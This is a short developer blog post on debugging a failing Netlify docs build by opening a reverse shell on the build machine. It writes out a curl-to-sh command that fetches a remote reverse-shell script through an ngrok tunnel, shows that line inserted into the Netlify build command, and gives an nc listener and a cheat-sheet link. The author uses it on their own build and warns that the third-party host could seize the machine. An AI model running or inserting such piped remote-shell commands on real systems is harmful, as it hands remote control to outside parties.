Kodiak uses Netlify to host its docs and so far it has mostly “just worked”.

However, after refactoring some scripts, the Netlify build failed in a way I couldn’t reproduce locally. Netlify doesn’t provide SSH access to builds, so I needed another way in; a reverse shell!

A reverse shell redirects the inputs and outputs of a shell on a target machine across the network to our local machine. Basically we get shell access to the remote machine without SSH.

I found this GitHub repository which provides a nice wrapper around some reverse shell scripts. But please don’t use this on machines you care about. A malicious owner of https://reverse-shell.sh could gain full access to your target machine.

Configuring a reverse shell

  1. On our local machine, start listening on a port with nc -kl 8888. This is where our reverse shell will appear.
  2. ngrok can give us a public address via ngrok tcp 8888.
  3. On our remote host, we can use our ngrok connection info to start a reverse shell. curl https://reverse-shell.sh/2.tcp.ngrok.io:17012 | sh
  4. Something like sh-3.2$ should appear in our local terminal where we started nc. We now have shell access to the remote machine.

Reverse shell on Netlify

For Netlify, my “Build command” looked like the following:

yarn install; s/build; curl https://reverse-shell.sh/2.tcp.ngrok.io:17012 | sh

With shell access I was able to find a bug with Yarn that caused the failure, which I was able to workaround.

I think Metasploit might be another interesting tool to use, but the basic reverse shell was enough for me.

I thought this was an useful list of reverse shells using different languages and programs: https://highon.coffee/blog/reverse-shell-cheat-sheet/